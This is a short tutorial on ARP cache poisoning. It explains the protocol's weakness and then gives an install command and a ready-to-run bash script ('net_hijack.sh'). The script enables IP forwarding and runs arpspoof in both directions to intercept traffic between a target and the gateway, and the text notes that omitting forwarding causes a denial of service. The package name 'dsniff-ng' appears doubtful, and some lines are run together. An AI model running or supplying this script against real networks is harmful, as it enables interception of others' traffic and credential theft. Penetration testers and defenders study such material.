Local Network ARP Spoofing Techniques
Address Resolution Protocol Overview
The Address Resolution Protocol (ARP) functions at the data link layer (OSI Layer 2), serving as the bridge between logical network identifiers (IP addresses) and physical hardware interfaces (MAC addresses). Within a local network segment, frame delivery relies exclusively on MAC addresses. ARP provides the dynamic mapping mechanism required for IP-based communications to resolve their corresponding hardware destinations.
Mechanics of Cache Poisoning
Network hosts maintain an ARP cache, a temporary mapping table of known IP-to-MAC relationships that undergoes periodic expiration. When a record ages out, the host must broadcast a new query to re-establish the link. This stateless and unauthenticated design is the foundation of ARP spoofing. A malicious actor transmits unsolicited forged ARP packets into the network, declaring that the attacker's MAC address corresponds to a legitimate IP—typically the subnet gateway or a specific target. By continuously broadcasting these fictitious mappings, the attacker overwrites the ARP tables across all local devices. Traffic intended for the legitimate IP is instead routed to the attacker's interface, effectively poisoning the network's routing state. This interception can manifest as gateway impersonation, victim impersonation, or bidirectional interception.
Executing a Spoofing Operation
Tools within the dsniff suite are commonly utilized for penetration testing these vulnerabilities. To provision the necessary utilities on Debian-derived systems:
aptitude install dsniff-ngTo demonstrate a more robust and logically complete interception setup, the following bash wrapper (net_hijack.sh) configures kernel forwarding to maintain target connectivity while performing bidirectional cache manipulation:
#!/bin/bash
LOCAL_INTERFACE="enp3s0"
TARGET_ENDPOINT="192.168.1.50"
NETWORK_GATEWAY="192.168.1.1"
# Activate kernel packet routing to prevent service disruption
sysctl -w net.ipv4.ip_forward=1 > /dev/null
echo "Starting ARP poisoning on interface $LOCAL_INTERFACE..."
# Impersonate gateway to the target
arpspoof -i $LOCAL_INTERFACE -t $TARGET_ENDPOINT $NETWORK_GATEWAY &
# Impersonate target to the gateway
arpspoof -i $LOCAL_INTERFACE -t $NETWORK_GATEWAY $TARGET_ENDPOINT &
waitExecuting this script diverts all transit traffic through the attacker's node. If the packet forwarding parameter were omitted, the target machine would experience a complete loss of external connectivity, effectively transforming the interception into a denial-of-service state.
